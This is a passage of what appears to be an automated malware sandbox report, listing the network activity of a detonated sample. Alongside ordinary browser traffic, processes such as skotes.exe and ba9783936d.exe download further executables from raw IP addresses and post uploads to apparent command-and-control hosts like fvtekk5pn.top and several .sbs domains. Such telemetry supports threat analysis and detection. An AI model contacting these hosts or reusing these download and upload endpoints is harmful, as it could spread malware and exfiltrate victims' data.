                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.212.238
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  www.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                  Response
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.212.206
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.212.238
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.46
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.169.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.180.14
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.178.14
                                  youtube-ui.l.google.com
                                  IN A
                                  172.217.16.238
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.201.110
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.46
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.200.14
                                  youtube-ui.l.google.com
                                  IN A
                                  216.58.204.78
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.206
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.187.238
                                  youtube-ui.l.google.com
                                  IN A
                                  142.250.179.238
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN A
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                • flag-gb
                                  GET
                                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                  firefox.exe
                                  Remote address:
                                  216.58.201.110:443
                                  Request
                                  GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
                                  host: consent.youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  cookie: SOCS=CAAaBgiAn5S6Bg
                                  cookie: YSC=H20jt0QTx5w
                                  cookie: __Secure-YEC=CgtZZGxfbE9IWWIyMCjT1pS6BjIKCgJHQhIEGgAgbg%3D%3D
                                  cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgbg%3D%3D
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN AAAA
                                  Response
                                  consent.youtube.com
                                  IN AAAA
                                  2a00:1450:4009:826::200e
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN AAAA
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN A
                                  Response
                                  fvtekk5pn.top
                                  IN A
                                  34.116.198.130
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN AAAA
                                  Response
                                • flag-pl
                                  POST
                                  http://fvtekk5pn.top/v1/upload.php
                                  ba9783936d.exe
                                  Remote address:
                                  34.116.198.130:80
                                  Request
                                  POST /v1/upload.php HTTP/1.1
                                  Host: fvtekk5pn.top
                                  Accept: */*
                                  Content-Length: 3424
                                  Content-Type: multipart/form-data; boundary=------------------------RrZrqL22gxUM2PCCNbPWTN
                                  Response
                                  HTTP/1.1 200 OK
                                  server: nginx/1.24.0 (Ubuntu)
                                  date: Tue, 26 Nov 2024 01:58:56 GMT
                                  content-type: text/plain; charset=utf-8
                                  content-length: 2
                                  x-ratelimit-limit: 30
                                  x-ratelimit-remaining: 23
                                  x-ratelimit-reset: 1732587936
                                  etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                • flag-us
                                  DNS
                                  youtube-ui.l.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  Response
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:827::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:818::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:80b::200e
                                  youtube-ui.l.google.com
                                  IN AAAA
                                  2a00:1450:4009:80a::200e
                                • flag-us
                                  DNS
                                  www.google.com
                                  chrome.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  172.217.16.228
                                • flag-us
                                  DNS
                                  www.google.com
                                  chrome.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                • flag-gb
                                  GET
                                  https://www.google.com/favicon.ico
                                  firefox.exe
                                  Remote address:
                                  172.217.16.228:443
                                  Request
                                  GET /favicon.ico HTTP/2.0
                                  host: www.google.com
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  accept: image/avif,image/webp,*/*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  referer: https://consent.youtube.com/
                                  sec-fetch-dest: image
                                  sec-fetch-mode: no-cors
                                  sec-fetch-site: cross-site
                                  te: trailers
                                • flag-us
                                  DNS
                                  www.google.com
                                  chrome.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN A
                                  Response
                                  www.google.com
                                  IN A
                                  172.217.16.228
                                • flag-us
                                  DNS
                                  www.google.com
                                  chrome.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  www.google.com
                                  IN AAAA
                                  Response
                                  www.google.com
                                  IN AAAA
                                  2a00:1450:4009:821::2004
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • flag-gb
                                  GET
                                  https://www.google.com/async/ddljson?async=ntp:2
                                  chrome.exe
                                  Remote address:
                                  172.217.16.228:443
                                  Request
                                  GET /async/ddljson?async=ntp:2 HTTP/2.0
                                  host: www.google.com
                                  sec-fetch-site: none
                                  sec-fetch-mode: no-cors
                                  sec-fetch-dest: empty
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                  accept-encoding: gzip, deflate, br
                                  accept-language: en-US,en;q=0.9
                                • flag-gb
                                  GET
                                  https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                  chrome.exe
                                  Remote address:
                                  172.217.16.228:443
                                  Request
                                  GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
                                  host: www.google.com
                                  x-client-data: CI3uygE=
                                  sec-fetch-site: cross-site
                                  sec-fetch-mode: no-cors
                                  sec-fetch-dest: empty
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                  accept-encoding: gzip, deflate, br
                                  accept-language: en-US,en;q=0.9
                                • flag-gb
                                  GET
                                  https://www.google.com/async/newtab_promos
                                  chrome.exe
                                  Remote address:
                                  172.217.16.228:443
                                  Request
                                  GET /async/newtab_promos HTTP/2.0
                                  host: www.google.com
                                  sec-fetch-site: cross-site
                                  sec-fetch-mode: no-cors
                                  sec-fetch-dest: empty
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                  accept-encoding: gzip, deflate, br
                                  accept-language: en-US,en;q=0.9
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN A
                                  Response
                                  fvtekk5pn.top
                                  IN A
                                  34.116.198.130
                                • flag-us
                                  DNS
                                  fvtekk5pn.top
                                  ba9783936d.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  fvtekk5pn.top
                                  IN AAAA
                                  Response
                                • flag-pl
                                  POST
                                  http://fvtekk5pn.top/v1/upload.php
                                  ba9783936d.exe
                                  Remote address:
                                  34.116.198.130:80
                                  Request
                                  POST /v1/upload.php HTTP/1.1
                                  Host: fvtekk5pn.top
                                  Accept: */*
                                  Content-Length: 24420
                                  Content-Type: multipart/form-data; boundary=------------------------RAnOeSfxX9LN1AXVSbrfLZ
                                  Response
                                  HTTP/1.1 200 OK
                                  server: nginx/1.24.0 (Ubuntu)
                                  date: Tue, 26 Nov 2024 01:59:06 GMT
                                  content-type: text/plain; charset=utf-8
                                  content-length: 2
                                  x-ratelimit-limit: 30
                                  x-ratelimit-remaining: 21
                                  x-ratelimit-reset: 1732587936
                                  etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  Response
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN A
                                  35.244.181.201
                                • flag-us
                                  DNS
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  prod.balrog.prod.cloudops.mozgcp.net
                                  IN AAAA
                                  Response
                                • flag-us
                                  DNS
                                  ciscobinary.openh264.org
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  ciscobinary.openh264.org
                                  IN A
                                  Response
                                  ciscobinary.openh264.org
                                  IN CNAME
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  a21ed24aedde648804e7-228765c84088fef4ff5e70f2710398e9.r17.cf1.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com
                                  a17.rackcdn.com
                                  IN CNAME
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  a17.rackcdn.com.mdc.edgesuite.net
                                  IN CNAME
                                  a19.dscg10.akamai.net
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-gb
                                  GET
                                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                                  firefox.exe
                                  Remote address:
                                  88.221.134.209:80
                                  Request
                                  GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1
                                  Host: ciscobinary.openh264.org
                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  Accept: */*
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  Connection: keep-alive
                                  Response
                                  HTTP/1.1 200 OK
                                  Last-Modified: Fri, 08 Nov 2024 02:52:28 GMT
                                  ETag: 85430baed3398695717b0263807cf97c
                                  Content-Length: 453023
                                  Accept-Ranges: bytes
                                  X-Timestamp: 1731034347.00215
                                  Content-Type: application/zip
                                  X-Trans-Id: tx264693c458e9421d8a991-006730bfe7dfw1
                                  Cache-Control: public, max-age=194512
                                  Expires: Thu, 28 Nov 2024 08:01:13 GMT
                                  Date: Tue, 26 Nov 2024 01:59:21 GMT
                                  Connection: keep-alive
                                • flag-us
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN A
                                  Response
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.209
                                  a19.dscg10.akamai.net
                                  IN A
                                  88.221.134.155
                                • flag-us
                                  DNS
                                  a19.dscg10.akamai.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  Response
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:869b
                                  a19.dscg10.akamai.net
                                  IN AAAA
                                  2a02:26f0:a1::58dd:86d1
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  172.217.169.46
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN A
                                  Response
                                  redirector.gvt1.com
                                  IN A
                                  172.217.169.46
                                • flag-us
                                  DNS
                                  redirector.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  redirector.gvt1.com
                                  IN AAAA
                                  Response
                                  redirector.gvt1.com
                                  IN AAAA
                                  2a00:1450:4009:818::200e
                                • flag-us
                                  DNS
                                  r4---sn-4g5e6ns7.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4---sn-4g5e6ns7.gvt1.com
                                  IN A
                                  Response
                                  r4---sn-4g5e6ns7.gvt1.com
                                  IN CNAME
                                  r4.sn-4g5e6ns7.gvt1.com
                                  r4.sn-4g5e6ns7.gvt1.com
                                  IN A
                                  173.194.182.73
                                • flag-us
                                  DNS
                                  r4.sn-4g5e6ns7.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-4g5e6ns7.gvt1.com
                                  IN A
                                  Response
                                  r4.sn-4g5e6ns7.gvt1.com
                                  IN A
                                  173.194.182.73
                                • flag-us
                                  DNS
                                  r4.sn-4g5e6ns7.gvt1.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  r4.sn-4g5e6ns7.gvt1.com
                                  IN AAAA
                                  Response
                                  r4.sn-4g5e6ns7.gvt1.com
                                  IN AAAA
                                  2a00:1450:4001:5c::9
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                  Response
                                  play.google.com
                                  IN A
                                  142.250.187.206
                                • flag-gb
                                  POST
                                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                                  firefox.exe
                                  Remote address:
                                  142.250.187.206:443
                                  Request
                                  POST /log?hasfast=true&authuser=0&format=json HTTP/2.0
                                  host: play.google.com
                                  user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
                                  accept: */*
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  referer: https://consent.youtube.com/
                                  content-type: text/plain;charset=UTF-8
                                  content-length: 763
                                  origin: https://consent.youtube.com
                                  sec-fetch-dest: empty
                                  sec-fetch-mode: no-cors
                                  sec-fetch-site: cross-site
                                  te: trailers
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN A
                                  Response
                                  play.google.com
                                  IN A
                                  142.250.187.206
                                • flag-us
                                  DNS
                                  play.google.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  play.google.com
                                  IN AAAA
                                  Response
                                  play.google.com
                                  IN AAAA
                                  2a00:1450:4009:81f::200e
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • flag-us
                                  DNS
                                  consent.youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  consent.youtube.com
                                  IN A
                                  Response
                                  consent.youtube.com
                                  IN A
                                  216.58.201.110
                                • 185.215.113.43:80
                                  http://185.215.113.43/Zu7JuNko/index.php
                                  http
                                  skotes.exe
                                  2.4kB
                                  2.9kB
                                  19
                                  14

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.43/Zu7JuNko/index.php

                                  HTTP Response

                                  200
                                • 31.41.244.11:80
                                  http://31.41.244.11/files/random.exe
                                  http
                                  skotes.exe
                                  84.0kB
                                  4.6MB
                                  1781
                                  4818

                                  HTTP Request

                                  GET http://31.41.244.11/files/7407486059/1Shasou.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://31.41.244.11/files/random.exe

                                  HTTP Response

                                  200
                                • 185.244.212.106:2227
                                  1Shasou.exe
                                  33.7kB
                                  892 B
                                  28
                                  22
                                • 34.116.198.130:80
                                  http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347
                                  http
                                  ba9783936d.exe
                                  273.8kB
                                  11.1MB
                                  5194
                                  7985

                                  HTTP Request

                                  GET http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347

                                  HTTP Response

                                  200
                                • 185.215.113.16:80
                                  http://185.215.113.16/off/random.exe
                                  http
                                  skotes.exe
                                  147.2kB
                                  5.8MB
                                  2747
                                  4187

                                  HTTP Request

                                  GET http://185.215.113.16/luma/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/steam/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/well/random.exe

                                  HTTP Response

                                  200

                                  HTTP Request

                                  GET http://185.215.113.16/off/random.exe

                                  HTTP Response

                                  200
                                • 104.21.7.169:443
                                  https://occupy-blushi.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  981 B
                                  4.3kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://occupy-blushi.sbs/api

                                  HTTP Response

                                  200
                                • 172.67.153.209:443
                                  https://blade-govern.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  980 B
                                  4.3kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://blade-govern.sbs/api

                                  HTTP Response

                                  200
                                • 104.21.1.25:443
                                  https://story-tense-faz.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  983 B
                                  4.3kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://story-tense-faz.sbs/api

                                  HTTP Response

                                  200
                                • 172.67.223.140:443
                                  https://disobey-curly.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  981 B
                                  4.3kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://disobey-curly.sbs/api

                                  HTTP Response

                                  200
                                • 104.21.94.231:443
                                  https://motion-treesz.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  981 B
                                  4.3kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://motion-treesz.sbs/api

                                  HTTP Response

                                  200
                                • 104.21.19.173:443
                                  https://powerful-avoids.sbs/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  983 B
                                  4.4kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://powerful-avoids.sbs/api

                                  HTTP Response

                                  200
                                • 2.22.99.85:443
                                  https://steamcommunity.com/profiles/76561199724331900
                                  tls, http
                                  72c1b8c8ee.exe
                                  1.6kB
                                  43.1kB
                                  24
                                  38

                                  HTTP Request

                                  GET https://steamcommunity.com/profiles/76561199724331900

                                  HTTP Response

                                  200
                                • 185.215.113.206:80
                                  http://185.215.113.206/c4becf79229cb002.php
                                  http
                                  f8bcf7e83e.exe
                                  727 B
                                  625 B
                                  5
                                  5

                                  HTTP Request

                                  GET http://185.215.113.206/

                                  HTTP Response

                                  200

                                  HTTP Request

                                  POST http://185.215.113.206/c4becf79229cb002.php

                                  HTTP Response

                                  200
                                • 172.67.160.80:443
                                  https://marshal-zhukov.com/api
                                  tls, http
                                  72c1b8c8ee.exe
                                  982 B
                                  4.4kB
                                  9
                                  9

                                  HTTP Request

                                  POST https://marshal-zhukov.com/api

                                  HTTP Response

                                  200
                                • 34.116.198.130:80
                                  http://fvtekk5pn.top/v1/upload.php
                                  http
                                  ba9783936d.exe
                                  1.2kB
                                  790 B
                                  11
                                  6

                                  HTTP Request

                                  POST http://fvtekk5pn.top/v1/upload.php

                                  HTTP Response

                                  200
                                • 34.120.5.221:443
                                  getpocket.cdn.mozilla.net
                                  firefox.exe
                                  104 B
                                  2
                                • 34.120.5.221:443
                                  https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                  tls, http2
                                  firefox.exe
                                  2.1kB
                                  15.6kB
                                  20
                                  22

                                  HTTP Request

                                  GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                                • 34.117.121.53:443
                                  firefox-settings-attachments.cdn.mozilla.net
                                  tls
                                  firefox.exe
                                  2.4kB
                                  9.3kB
                                  25
                                  20
                                • 172.217.169.78:443
                                  youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.6kB
                                  7.6kB
                                  12
                                  10
                                • 172.217.169.78:443
                                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                  tls, http2
                                  firefox.exe
                                  2.8kB
                                  8.9kB
                                  20
                                  17

                                  HTTP Request

                                  GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                • 127.0.0.1:49361
                                  firefox.exe
                                • 127.0.0.1:49369
                                  firefox.exe
                                • 172.217.169.78:443
                                  www.youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.4kB
                                  7.7kB
                                  13
                                  10
                                • 172.217.169.78:443
                                  www.youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.6kB
                                  8.8kB
                                  13
                                  11
                                • 216.58.201.110:443
                                  consent.youtube.com
                                  tls, http2
                                  firefox.exe
                                  1.9kB
                                  7.8kB
                                  14
                                  14
                                • 216.58.201.110:443
                                  https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                  tls, http2
                                  firefox.exe
                                  2.9kB
                                  64.8kB
                                  31
                                  59

                                  HTTP Request

                                  GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                                • 34.116.198.130:80
                                  http://fvtekk5pn.top/v1/upload.php
                                  http
                                  ba9783936d.exe
                                  4.0kB
                                  479 B
                                  9
                                  5

                                  HTTP Request

                                  POST http://fvtekk5pn.top/v1/upload.php

                                  HTTP Response

                                  200
                                • 172.217.16.228:443
                                  https://www.google.com/favicon.ico
                                  tls, http2
                                  firefox.exe
                                  2.0kB
                                  7.4kB
                                  17
                                  15

                                  HTTP Request

                                  GET https://www.google.com/favicon.ico
                                • 172.217.16.228:443
                                  www.google.com
                                  chrome.exe
                                  52 B
                                  1
                                • 172.217.16.228:443
                                  https://www.google.com/async/newtab_promos
                                  tls, http2
                                  chrome.exe
                                  1.9kB
                                  8.5kB
                                  17
                                  19

                                  HTTP Request

                                  GET https://www.google.com/async/ddljson?async=ntp:2

                                  HTTP Request

                                  GET https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0

                                  HTTP Request

                                  GET https://www.google.com/async/newtab_promos
                                • 172.217.16.228:443
                                  www.google.com
                                  tls
                                  chrome.exe
                                  907 B
                                  4.6kB
                                  7
                                  7
                                • 34.116.198.130:80
                                  http://fvtekk5pn.top/v1/upload.php
                                  http
                                  ba9783936d.exe
                                  25.6kB
                                  643 B
                                  24
                                  9

                                  HTTP Request

                                  POST http://fvtekk5pn.top/v1/upload.php

                                  HTTP Response

                                  200
                                • 88.221.134.209:80
                                  http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                                  http
                                  firefox.exe
                                  3.7kB
                                  467.4kB
                                  74
                                  346

                                  HTTP Request

                                  GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip

                                  HTTP Response

                                  200
                                • 172.217.169.46:443
                                  redirector.gvt1.com
                                  tls
                                  firefox.exe
                                  1.6kB
                                  8.8kB
                                  16
                                  19
                                • 173.194.182.73:443
                                  r4---sn-4g5e6ns7.gvt1.com
                                  tls
                                  firefox.exe
                                  12.9kB
                                  1.8MB
                                  261
                                  1294
                                • 142.250.187.206:443
                                  https://play.google.com/log?hasfast=true&authuser=0&format=json
                                  tls, http2
                                  firefox.exe
                                  2.7kB
                                  8.7kB
                                  17
                                  21

                                  HTTP Request

                                  POST https://play.google.com/log?hasfast=true&authuser=0&format=json
                                • 216.58.201.110:443
                                  consent.youtube.com
                                  tls
                                  firefox.exe
                                  1.3kB
                                  1.2kB
                                  8
                                  8
                                • 127.0.0.1:9222
                                  ba9783936d.exe
                                • 127.0.0.1:9222
                                  ba9783936d.exe
                                • 8.8.8.8:53
                                  home.fvtekk5pn.top
                                  dns
                                  ba9783936d.exe
                                  174 B
                                  226 B
                                  2
                                  2

                                  DNS Request

                                  home.fvtekk5pn.top

                                  DNS Request

                                  home.fvtekk5pn.top

                                  DNS Response

                                  34.116.198.130

                                • 8.8.8.8:53
                                  property-imper.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  64 B
                                  129 B
                                  1
                                  1

                                  DNS Request

                                  property-imper.sbs

                                • 8.8.8.8:53
                                  frogs-severz.sbs
                                  dns
                                  72c1b8c8ee.exe
                                  62 B
                                  127 B
                                  1
